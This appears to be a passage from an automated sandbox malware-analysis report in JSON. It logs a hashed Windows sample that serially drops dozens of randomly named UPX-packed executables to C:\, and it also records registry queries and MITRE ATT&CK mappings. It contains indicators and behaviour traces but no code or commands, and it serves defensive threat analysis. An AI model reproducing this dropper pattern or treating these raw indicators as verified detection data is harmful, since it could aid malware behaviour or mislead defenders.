\"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" trying to touch file \"c:\\ui\\SwDRM.dll\"\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" trying to touch file \"C:\\Windows\\System32\\imm32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"026026.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"hfxjvn.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"vxbrbpd.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"lbvtbl.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"22428.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"66488.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"4640842.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"068466.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"06200.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"8288862.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"0484046.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"tpjrfn.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" writes file \"c:\\026026.exe\"\n \"026026.exe\" writes file \"c:\\hfxjvn.exe\"\n \"hfxjvn.exe\" writes file \"c:\\vxbrbpd.exe\"\n \"vxbrbpd.exe\" writes file \"c:\\lbvtbl.exe\"\n \"lbvtbl.exe\" writes file \"c:\\22428.exe\"\n \"22428.exe\" writes file \"c:\\66488.exe\"\n \"66488.exe\" writes file \"c:\\4640842.exe\"\n \"4640842.exe\" writes file \"c:\\068466.exe\"\n \"068466.exe\" writes file \"c:\\06200.exe\"\n \"06200.exe\" writes file \"c:\\8288862.exe\"\n \"8288862.exe\" writes file \"c:\\0484046.exe\"\n \"0484046.exe\" writes file \"c:\\tpjrfn.exe\"\n \"tpjrfn.exe\" writes file \"c:\\drpdftl.exe\"\n \"drpdftl.exe\" writes file \"c:\\htpdr.exe\"\n \"htpdr.exe\" writes file \"c:\\frbnxt.exe\"\n \"frbnxt.exe\" writes file \"c:\\bfllh.exe\"\n \"bfllh.exe\" writes file \"c:\\hptntt.exe\"\n \"hptntt.exe\" writes file \"c:\\vtrppln.exe\"\n \"vtrppln.exe\" writes file \"c:\\rdttflx.exe\"\n \"rdttflx.exe\" writes file \"c:\\ljvfrdn.exe\"\n \"ljvfrdn.exe\" writes file \"c:\\ntjvt.exe\"\n \"ntjvt.exe\" writes file \"c:\\lllfpll.exe\"\n \"lllfpll.exe\" writes file \"c:\\lxrhrth.exe\"\n \"lxrhrth.exe\" writes file \"c:\\nntvf.exe\"\n \"nntvf.exe\" writes file \"c:\\806004.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"026026.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"hfxjvn.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"vxbrbpd.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"lbvtbl.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"22428.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"66488.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"4640842.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"068466.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"06200.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"8288862.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"0484046.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"tpjrfn.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"drpdftl.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"htpdr.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"frbnxt.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"bfllh.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"hptntt.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"vtrppln.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"rdttflx.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"ljvfrdn.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"ntjvt.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"lllfpll.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"lxrhrth.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"nntvf.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"48C6E4A7C0CB1D1F353362EDEAD646DB84A49D943FA42543E0434CE4231F25B1\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\APPCOMPAT\"; Key: \"DISABLEENGINE\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SHELL FOLDERS\"; Key: \"CACHE\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\"; Key: \"DISABLELOCALOVERRIDE\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"rfbrlrh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"blpjp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"vllrv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hpjbbfh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4000248.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"vptfx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"dvlvp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"pdljr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"brvtdb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"2846688.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"488862.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"06448.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"vjrdb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"tdplj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"02482.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"86844.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"njnplr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"jbvjrv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"djhxhx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rdtdhx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"jhhhxxb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"llfppf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hxfnr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"xtxdjfh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"2808244.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"04424.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"24442.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"802244.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"frrtbb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\frrtbb.exe]- [targetUID: 00000000-00004360]\n \"fvjlh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fvjlh.exe]- [targetUID: 00000000-00004360]\n \"xbbhhv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xbbhhv.exe]- [targetUID: 00000000-00002572]\n \"040208.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\040208.exe]- [targetUID: 00000000-00004588]\n \"624206.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\624206.exe]- [targetUID: 00000000-00004576]\n \"044866.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\044866.exe]- [targetUID: 00000000-00003824]\n \"84604.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\84604.exe]- [targetUID: 00000000-00000884]\n \"020864.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\020864.exe]- [targetUID: 00000000-00000884]\n \"thvfh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\thvfh.exe]- [targetUID: 00000000-00000956]\n \"nxnhll.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nxnhll.exe]- [targetUID: 00000000-00000872]\n \"pxvdt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pxvdt.exe]- [targetUID: 00000000-00000872]\n \"lfhtd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lfhtd.exe]- [targetUID: 00000000-00001424]\n \"prbhn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\prbhn.exe]- [targetUID: 00000000-00001920]\n \"vrjppt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vrjppt.exe]- [targetUID: 00000000-00001920]\n \"pbnblrt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pbnblrt.exe]- [targetUID: 00000000-00003228]\n \"tdbrbj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tdbrbj.exe]- [targetUID: 00000000-00003164]\n \"dllffdl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dllffdl.exe]- [targetUID: 00000000-00002836]\n \"004802.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\004802.exe]- [targetUID: 00000000-00002836]\n \"2628204.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2628204.exe]- [targetUID: 00000000-00001888]\n \"884228.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\884228.exe]- [targetUID: 00000000-00003248]\n \"42004.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\42004.exe]- [targetUID: 00000000-00003248]\n \"624082.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\624082.exe]- [targetUID: 00000000-00001844]\n \"rhjvpvp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rhjvpvp.exe]- [targetUID: 00000000-00004020]\n \"nbnxn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nbnxn.exe]- [targetUID: 00000000-00004020]\n \"lfnjxdh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lfnjxdh.exe]- [targetUID: 00000000-00004524]\n \"jrrhxbf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jrrhxbf.exe]- [targetUID: 00000000-00004236]\n \"rpbfjr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rpbfjr.exe]- [targetUID: 00000000-00004236]\n \"hjjtjd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hjjtjd.exe]- [targetUID: 00000000-00003424]\n \"tlbnpbh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tlbnpbh.exe]- [targetUID: 00000000-00003424]\n \"ttldj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ttldj.exe]- [targetUID: 00000000-00003692]\n \"dpjjvjv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dpjjvjv.exe]- [targetUID: 00000000-00004124]\n \"fpplvv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fpplvv.exe]- [targetUID: 00000000-00004124]\n \"64860.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\64860.exe]- [targetUID: 00000000-00003220]\n \"2006628.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2006628.exe]- [targetUID: 00000000-00002528]\n \"8600684.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8600684.exe]- [targetUID: 00000000-00003812]\n \"2820044.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2820044.exe]- [targetUID: 00000000-00003812]\n \"046644.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\046644.exe]- [targetUID: 00000000-00004140]\n \"20402.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\20402.exe]- [targetUID: 00000000-00001372]\n \"4228006.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4228006.exe]- [targetUID: 00000000-00001372]\n \"806004.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\806004.exe]- [targetUID: 00000000-00004472]\n \"nntvf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nntvf.exe]- [targetUID: 00000000-00003668]\n \"lxrhrth.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lxrhrth.exe]- [targetUID: 00000000-00003668]\n \"lllfpll.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lllfpll.exe]- [targetUID: 00000000-00002736]\n \"ntjvt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ntjvt.exe]- [targetUID: 00000000-00004448]\n \"ljvfrdn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ljvfrdn.exe]- [targetUID: 00000000-00000852]\n \"rdttflx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rdttflx.exe]- [targetUID: 00000000-00000852]\n \"vtrppln.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vtrppln.exe]- [targetUID: 00000000-00004116]\n \"hptntt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hptntt.exe]- [targetUID: 00000000-00002096]\n \"bfllh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bfllh.exe]- [targetUID: 00000000-00004172]\n \"frbnxt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\frbnxt.exe]- [targetUID: 00000000-00004172]\n \"htpdr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\htpdr.exe]- [targetUID: 00000000-00006120]\n \"drpdftl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\drpdftl.exe]- [targetUID: 00000000-00000848]\n \"tpjrfn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tpjrfn.exe]- [targetUID: 00000000-00000848]\n \"0484046.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0484046.exe]- [targetUID: 00000000-00006084]\n \"8288862.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8288862.exe]- [targetUID: 00000000-00006084]\n \"06200.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\06200.exe]- [targetUID: 00000000-00002260]\n \"068466.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\068466.exe]- [targetUID: 00000000-00002260]\n \"4640842.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4640842.exe]- [targetUID: 00000000-00003512]\n \"66488.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\66488.exe]- [targetUID: 00000000-00003512]\n \"22428.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\22428.exe]- [targetUID: 00000000-00005956]\n \"lbvtbl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lbvtbl.exe]- 